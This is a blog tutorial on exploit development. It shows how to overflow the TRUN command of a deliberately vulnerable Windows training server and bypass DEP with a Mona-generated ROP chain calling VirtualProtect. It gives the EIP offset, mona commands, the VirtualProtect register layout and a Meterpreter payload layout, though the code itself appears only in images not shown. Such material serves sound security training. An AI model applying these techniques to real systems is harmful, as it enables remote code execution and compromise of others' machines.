Windows PE32 bypass DEP via ROP

September 27, 2020 · 11 min read

author

Hi, I had recently written a post on the topic of Windows PE32 exploitation. I had no DEP active at that time, as it is the standard case with Windows.

In this post I would like to talk about the implementation of the DEP in Windows and also show a method how this can be circumvented.

What is DEP?

DEP stands for Data Execution Prevention and prevents malicious code etc... from being executed in certain memory areas such as stack. For example, DEP prevents shellcode from executing in buffer overflows as in the classic case, which is a problem for us now. What could be done? We could try ret2libc with a call to the WinExec method. ROP would be a possibility. But what should ROP do for us now? To clarify this, let's take a closer look at DEP in Windows.

Microsoft introduced DEP with Windows XP SP2 (2004). With it it was then past with the classical Bufferoverflows. If an application now wants to execute code in a non-executable area, an access-violation exception is thrown. If this is not caught, the application crashes and that was it. By default, this prevents the application from executing code in memory areas. The application must request new memory marked with one of the flags. The flags are PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY. Only then code could be executed. Another possibility is that the application can change the rules using the SetProcessDEPPolicy method. The application can also use VirtualProtect to mark memory areas as executable. VirtualAlloc is also a way for the application to request memory areas to be executable. Here in the post I would like to show how this works with VirtualProtect.

In order to use VirtualProtect, to bypass DEP, we must first understand how this method works, now that we know what it does. VirtualProtect is built from the signature like this:

BOOL VirtualProtect(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD flNewProtect,
    PDWORD lpflOldProtect
);

Ref: https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect

The method gets 4 parameters, lpAddress, dwSize, flNewProtect and lpflOldProtect. The parameter lpAddress is for the address, i.e. from where the change is to be made. The parameter dwSize describes the range or the size of the range from the address, which is contained in lpAddress. With the two parameters one can select the exact start and width of the address space which is to be changed, as in the following picture.

The parameter flNewProtect specifies via defined constants which protection mode the area now gets. The most important constants are listed here in a small table.

Constant	Decription
PAGE_EXECUTE (0x10)	The complete area is executable but not writable
PAGE_EXECUTE_READ (0x20)	The complete area is executable and read-only but not writable.
PAGE_EXECUTE_READWRITE (0x40)	The complete area is executable, readable and writable but not writable.

These three constants are compatible with the VirutalProtect method, the best option for us would be PAGE_EXECUTE_READWRITE, because here we have RWX privileges as under Unix and so we can do what we want. In this case we want to make our shellcode executable and execute it afterwards.

The last parameter is lpflOldProtect and describes the protection mode that was applied before.

And how do we build the call? We can either build it manually or automated with Mona.py, using the Immunity Debugger.

Vulnerable application

Our application will be the vulnerable-server, which can be downloaded from Github and is designed for exploit development. First we import all the libraries we need and create a remote connection, which simply sends the pattern Metasploit creates as argument for the TRUN command. Our pattern is 5000 bytes long, which should be enough, since the offset to the EIP should be somewhere. At this point, everything is the same as the first part. The shell should look like in the picture.

Create the exploit base

At this point we run the application and start the exploit to see where exactly the EIP is overwritten. Again, it is the same as in the first part. In the Immunity Debugger, we see that our EIP has been overwritten with the pattern.

Now we can simply use the value from the EIP to determine the exact point where we overwrite the EIP using the Pattern Offset Calculator. The exact offset to the EIP is 2006 bytes, where we can simply use junk data. After that, to check if the EIP is completely overwritten, we can simply append the default pattern "BBBB" to the junk data $Junk + EIP$ . Now when we run our modified exploit, we should have overwritten the EIP with "BBBB" and thus, have full control over the EIP as in the following image.

At this point, as in the first part, we can look for an address that executes either JMP ESP, PUSH ESP, RET or CALL ESP to get to our shellcode. This wouldn't do any good at this point, because we jump into a memory area which is Non-Executable, so our shellcode won't be executed and we end up with an "Access violation". What we can do is to generate a shellcode, because we still need it, because it will be executed after we set the memory area to executable with our ROP-chain.

In the upper image you can see the shellcode which was embedded in the exploit. This is a simple meterpretershell, which will be executed later. In line 41 you can see how the whole exploit is structured. Here we have first the junk like in the first part, followed by the EIP. After the EIP, we have another small nopsled with a length of 32 bytes, so that when we jump to the stack, we don't end up in the middle of the shellcode. After the nopsled comes the shellcode. In the schematic structure it looks approximately like in the following picture.

Developt the ROP-Chain

Now we can turn to the ROP chain to disable DEP in the stack, where our shellcode is located, or to make the area executable. Here you can use Ropper, for example, to get all the gadgets or you can also use Mona.py to generate the ROP chain. In this post, I'll have it generated via Mona.py. This command generates the ROP chain for us

!mona rop -m *.dll -cp nonull

What does this command do in detail? First we want to create a ROP chain via !mona, that's what the rop argument is for. The parameter -m specifies which modules should be searched for gadgets by the application, e.g. KERNEL32.dll. In this case all DLL's should be searched. The parameter -cp specifies which requirements the pointer addresses (gadget addresses) should fulfill. In this case the addresses should have no null bytes. You can read the whole thing again here.

Once you have done this, you can now wait a little while for Mona to finish. It may take a few minutes under certain circumstances. So here you can put on a coffee and switch off briefly.

When Mona is finished, you can display the rop_chain.txt " and copy the complete contents to the Kali Linux VM via SSH and the nano editor. The rop_chain.txt can be found in the working directory, which you have set before. If you have not done this, Mona should create all the output in the program folder of the Immunity Debugger, you can also change this with:

!mona config -set workingfolder c:\monaoutput\%p

Here %p stands for the process name that runs in the debugger. If you want to embed the whole thing in the exploit, you should take a closer look at the rop_chain.txt beforehand, once to check whether addresses are included which are marked either with REBASED or "ASLR. Because here the case can occur later that after a reboot of the system, the exploit must be adapted again, because the addresses have changed. Let's first take a closer look at the register setting.

Register setup for VirtualProtect() :
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD

Here you can see how the registers must be set so that the method VirtualProtect can be executed, so that our shellcode is executable. Here I have to mention that there is a 5th parameter with the method. The 5th parameter is the return address to jump to the shellcode. Mona gives us 2 possibilities, I will try to generalize the whole thing that you can roughly understand what is happening here.

The register ECX stores the address from where we want to change the range, i.e. the lpAddress. The register EBX contains the length(dwSize), i.e. over how many addresses the area should go. The register EDX on the other hand gives the new protection mode, so in this case flNewProctect = PAGE_EXECUTE_READWRITE, so we have the possibility to read, write and execute. EAX and ESI store the address of the method VirtualProtect once as pointer or as reference after case distinction e.g. whether it is possible to call the method over pointer. If it is possible to call the method via pointer, EAX is simply set to NOP's and nothing is done with it for the time being. The register EBP can normally contain the address which points to a JMP ESP. Alternatively, if that doesn't work, a POP to skip the next 4, so that we can jump to the manually searched address of a JMP ESP instruction at the end. The EDI register simply contains the instructions so that we have a return and thus get back on the stack. It's a bit tricky to understand what exactly happens there, I admit I don't understand it 100% either, but roughly you can guess what happens there. First the registers are set as they should be and then the call takes place, similar to Linux.

Embedd the ROP-Chain and test it

If we copy out the ROP chain, we will find that there are quite a lot of ROP chains. There are ones for VirtualProtect, VirtualAlloc, etc... Each chain is translated into Ruby, C, Python and Javascript, which is quite handy. All we have to do now is find our ROP chain for VirtualProtect in Python and then put it into our exploit.

In the picture we can see the embedded ROP chain in our exploit. We also see that almost all gadgets have been marked as warnings with ASLR. We now need to embed the ROP chain in the exploit, then the exploit is ready. The variable eip can be removed here or replaced by the variable rop_chain. This means that the EIP no longer points to a jump address, but directly to the ROP chain, so that it is executed directly.

In the picture you can see how exactly the exploit is structured. The changes in the exploit code should now look like the scheme.

Once the whole thing is customized, we can test our exploit. If everything works, we should get a meterpretershell. I have made a small recording, so that you can see the exploit in action 😄

As you can see, the exploit works quite well.

Final thoughts...

Binary Exploitation on Windows is not as hard as you might think, because most of the information and tutorials you can find are about Linux. Sure, there are also some tutorials and writeups about Windows. You see, Windows also has its security features, which have to be bypassed, so that you can get a shell and execute your code. It's a bit tricky, even for me, as I was previously only focused on Linux. I think for many, it's a little difficult at first to go from binary exploitation on Linux to Windows, or to add to it. But we also saw that on Windows there are also some tools to implement some techniques in Binary Exploitation. One of the tools was Mona.py. Ok, here I should mention, what I noticed, that the ROP-chains, which are generated, do not always work. So here you have to, sometimes do it yourself, but hey! One deals with Windows in the core.

I hope you enjoyed it and bye... 😄

What is DEP?​

Vulnerable application​

Create the exploit base​

Developt the ROP-Chain​

Embedd the ROP-Chain and test it​

Final thoughts...​